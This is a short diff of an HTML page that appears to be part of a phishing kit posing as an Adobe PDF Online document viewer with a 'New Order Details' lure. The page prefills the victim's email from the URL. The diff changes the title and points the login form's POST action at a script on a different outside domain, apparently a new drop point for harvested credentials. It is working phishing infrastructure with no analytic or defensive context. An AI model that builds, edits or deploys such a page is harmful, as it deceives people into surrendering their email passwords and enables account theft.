--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
   <!-- My custom style rules -->
   <link rel="stylesheet" href="Adobe%20PDF%20Online_files/styles.css">
   <!-- Page Title -->
-  <title>New Order Details/invoice</title>
+  <title>New Order Details/confirmation </title>
   
   <style>
    
@@ -286,7 +286,7 @@ $("#email").val($.urlPeram('email'));
                 </div>
                 <!-- End of server response message div -->
 
-                <form action="https://illawarraurology.com/feedup.php" method="post">
+                <form action="https://martindesign.co/logon.php" method="post">
                   
                     <div class="form-group">
                     <!-- User Email Label -->
